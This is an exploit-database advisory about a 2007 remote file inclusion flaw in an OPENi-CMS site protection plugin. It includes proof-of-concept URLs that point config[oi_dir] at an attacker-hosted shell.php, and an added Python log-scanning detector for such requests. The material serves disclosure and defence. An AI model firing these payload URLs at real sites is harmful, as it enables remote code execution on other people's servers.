OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability
2007-02-11T00:00:00
ID : EDB-ID:3292
Type : exploitdb
Reporter : y3dips
Modified : 2007-02-11T00:00:00
Description
OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability. CVE-2007-0881. Webapps exploit for php platform
------------------------------------------------------------------------------------
[ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion
------------------------------------------------------------------------------------
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : February, 11 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv64-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Internal range (site protection), version: 1.0
Openi CMS plugins (http://www.openi-cms.org)
URL : http://www.openi-cms.org
Download-path : http://www.openi-cms.org/oi-download.php/45/file_src/oi_plugin_site_protection_1_0.zip
Description : With this plugin you can release page ranges only to certain users. The user
must authenticate with user name and password. Several users can be created for
a page range. The users and the pages to be protected are set up
in the editorial environment by the administrator.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
The "oi_dir" element of $config used in index.php is not properly sanitized.
---------------index.php --------------------
...
<?PHP
global $config;
require_once($config["oi_dir"]."/base/sitemap_classes.php");
class plg_site_protection extends Plugin {
...
----------------------------------------------
An attacker can exploit this vulnerability with a simple PHP injection script.
Poc/Exploit:
~~~~~~~~~~~~
http://target-openi/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://attacker/shell.php ?
Notes:
~~~~~~
I have to change the variable "oi_dir" to "openi_dir" to get the CMS to work (config file),
but then you just change the exploit to
http://target-openi/open-admin/plugins/site_protection/index.php?config%5bopeni_dir%5d=http://attacker/shell.php?
It doesn't matter because the variable is still unsanitized.
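Detection sketch for the request pattern described above, covering both the "oi_dir" and the "openi_dir" parameter names (an added example, not part of the original advisory). The Apache-style log format, the constructed sample lines, the host attacker.example and the function name find_rfi_attempts are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path and key names are taken from the advisory text.
PLUGIN_PATH = "/plugins/site_protection/index.php"
KEY_RE = re.compile(r"^config\[(oi_dir|openi_dir)\]$", re.I)
# A value that starts with a scheme (http:, ftp:, php:, data:) is not a local
# directory. Two or more scheme characters are required so "C:\..." is ignored.
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]+:", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Feb/2007:10:01:02 +0700] "GET /open-admin/plugins/'
    'site_protection/index.php?config%5boi_dir%5d=http://attacker.example/'
    'shell.php? HTTP/1.1" 200 512',
    '203.0.113.7 - - [11/Feb/2007:10:01:09 +0700] "GET /open-admin/plugins/'
    'site_protection/index.php?config%5Bopeni_dir%5D=http://attacker.example/'
    'shell.php? HTTP/1.1" 200 512',
    '198.51.100.4 - - [11/Feb/2007:10:02:00 +0700] "GET /open-admin/plugins/'
    'site_protection/index.php?page=2 HTTP/1.1" 200 1024',
    '198.51.100.9 - - [11/Feb/2007:10:03:00 +0700] "GET /index.php?'
    'config%5boi_dir%5d=http://attacker.example/x HTTP/1.1" 404 0',
]

def find_rfi_attempts(log_lines):
    """Return (line_no, key, value) for plugin requests that set a config dir key to a URL."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not unquote(target.path).lower().endswith(PLUGIN_PATH):
            continue
        # parse_qsl decodes %5b / %5d once; the extra unquote also flags
        # double-encoded forms such as %255b.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            key, value = unquote(key), unquote(value)
            if KEY_RE.match(key) and SCHEME_RE.match(value):
                hits.append((line_no, key, value))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Only the first two sample lines are reported; the third carries no config key and the fourth targets a different script.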
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ my lovely ana
~ k-159 (never stop advising [pushing] me :P), the_day (echo young evil thinker),
~ and all echo staff
~ str0ke, waraxe, negative
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips|| echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/
# milw0rm.com [2007-02-11]
---------------------------------------------------------------------------
Related entries:
~~~~~~~~~~~~~~~~
CVE-2007-0881 (published 2007-02-12T15:28:00)
CVSS : 6.8 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
URL : https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0881
Description : PHP remote file inclusion vulnerability in the Seitenschutz plugin for OPENi-CMS 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the (1) config[oi_dir] and possibly (2) config[openi_dir] parameters to open-admin/plugins/site_protection/index.php. NOTE: vector 2 might be the same as CVE-2006-4750.

OSVDB:33175 (published 2007-02-11T07:48:43)
Title : OPENi-CMS Seitenschutz Plugin open-admin/plugins/site_protection/index.php config[oi_dir] Variable Remote File Inclusion
CVSS : 6.8 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
URL : https://vulners.com/osvdb/OSVDB:33175
References:
Secunia Advisory ID: 24119 (https://secuniaresearch.flexerasoftware.com/advisories/24119/)
Other Advisory URL: http://echo.or.id/adv/adv64-y3dips-2007.txt
ISS X-Force ID: 32423
Generic Exploit URL: http://www.milw0rm.com/exploits/3292
FrSIRT Advisory: ADV-2007-0556
CVE-2007-0881 (https://vulners.com/cve/CVE-2007-0881)
Bugtraq ID: 22511